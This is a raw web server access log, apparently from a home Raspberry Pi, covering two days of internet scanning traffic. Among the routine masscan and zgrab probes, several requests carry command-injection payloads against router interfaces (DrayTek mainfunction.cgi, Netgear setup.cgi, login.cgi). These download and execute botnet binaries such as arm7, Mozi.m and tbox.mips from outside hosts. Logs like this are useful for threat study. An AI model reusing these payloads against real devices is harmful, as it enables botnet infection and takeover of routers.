Sat Apr 11 06:25:06 MDT 2020 06:25:06 up 46 days, 10:53, 1 user, load average: 0.39, 0.27, 0.27 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 46days 55:45 2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE 187.188.40.11 - - [11/Apr/2020:12:37:59 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 187.188.40.11 - - [11/Apr/2020:12:37:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.129.53 - - [11/Apr/2020:14:16:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 112.126.56.11 - - [11/Apr/2020:15:08:34 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" 112.126.56.11 - - [11/Apr/2020:15:08:34 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" 185.59.66.233 - - [11/Apr/2020:15:39:46 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 185.59.66.233 - - [11/Apr/2020:15:39:46 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 80.82.78.104 - - [11/Apr/2020:15:52:57 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "Go-http-client/1.1" 36.90.143.34 - - [11/Apr/2020:16:31:53 +0000] "GET / HTTP/1.1" 400 0 "" "" 208.91.109.18 - - [11/Apr/2020:16:32:55 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.18 - - [11/Apr/2020:16:32:55 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 45.234.222.181 - - [11/Apr/2020:20:04:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 175.3.164.35 - - [11/Apr/2020:20:30:29 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" "" 200.107.218.34 - - [11/Apr/2020:20:57:32 
+0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 103.118.118.137 - - [11/Apr/2020:21:43:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 35.205.86.202 - - [11/Apr/2020:21:45:20 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 46.101.171.183 - - [11/Apr/2020:22:35:49 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 46.101.171.183 - - [11/Apr/2020:22:35:52 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 192.241.239.71 - - [11/Apr/2020:22:43:46 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 213.14.32.42 - - [12/Apr/2020:01:03:20 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 213.14.32.42 - - [12/Apr/2020:01:03:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 61.219.11.153 - - [12/Apr/2020:01:20:39 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 167.99.40.21 - - [12/Apr/2020:02:09:43 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 167.99.40.21 - - [12/Apr/2020:02:09:47 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 186.214.177.176 - - [12/Apr/2020:03:22:51 +0000] "GET / HTTP/1.1" 400 0 "" "" 159.146.37.43 - - [12/Apr/2020:03:53:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 142.93.187.70 - - [12/Apr/2020:04:14:27 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 84.99.36.50 - - [12/Apr/2020:05:01:42 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.49.226.140/luoqxbocmkxnexy/tbox.mips%20-O%20->%20/tmp/leonn;chmod%20777%20/tmp/leonn;/tmp/leonn%20dlink.mips%27$ HTTP/1.1" 400 0 
"" "tbox/2.0" 84.99.36.50 - - [12/Apr/2020:05:01:42 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 87.244.228.199 - - [12/Apr/2020:07:23:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 176.113.174.95 - - [12/Apr/2020:07:26:59 +0000] "GET / HTTP/1.1" 400 0 "" "" 221.153.26.117 - - [12/Apr/2020:07:41:27 +0000] "GET / HTTP/1.1" 400 0 "" "" 167.114.169.17 - - [12/Apr/2020:08:06:39 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 167.114.169.17 - - [12/Apr/2020:08:06:43 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 139.99.141.237 - - [12/Apr/2020:08:32:09 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 139.99.141.237 - - [12/Apr/2020:08:32:12 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 139.99.141.237 - - [12/Apr/2020:08:32:15 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 195.22.237.98 - - [12/Apr/2020:09:13:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 185.202.2.226 - - [12/Apr/2020:09:33:17 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 183.215.80.147 - - [12/Apr/2020:09:35:48 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 183.215.80.147 - - [12/Apr/2020:09:35:48 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.155.39.37 - - [12/Apr/2020:09:40:12 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 162.155.39.37 - - [12/Apr/2020:09:40:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 190.152.144.202 - - [12/Apr/2020:11:22:18 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 400 0 "" "" 190.152.144.202 - - [12/Apr/2020:11:22:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 109.28.7.155 - - [12/Apr/2020:11:30:12 +0000] 
"GET / HTTP/1.1" 400 0 "" "" 109.28.7.155 - - [12/Apr/2020:11:30:13 +0000] "GET / HTTP/1.1" 400 0 "" "" 103.75.167.6 - - [12/Apr/2020:12:01:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 35.205.86.202 - - [12/Apr/2020:12:02:43 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 96.80.89.253 - - [12/Apr/2020:12:05:35 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 96.80.89.253 - - [12/Apr/2020:12:05:35 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 180.189.165.13 - - [12/Apr/2020:12:22:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" Sun Apr 12 06:25:06 MDT 2020 06:25:07 up 47 days, 10:53, 1 user, load average: 0.30, 0.23, 0.24 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 47days 1:07m 2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE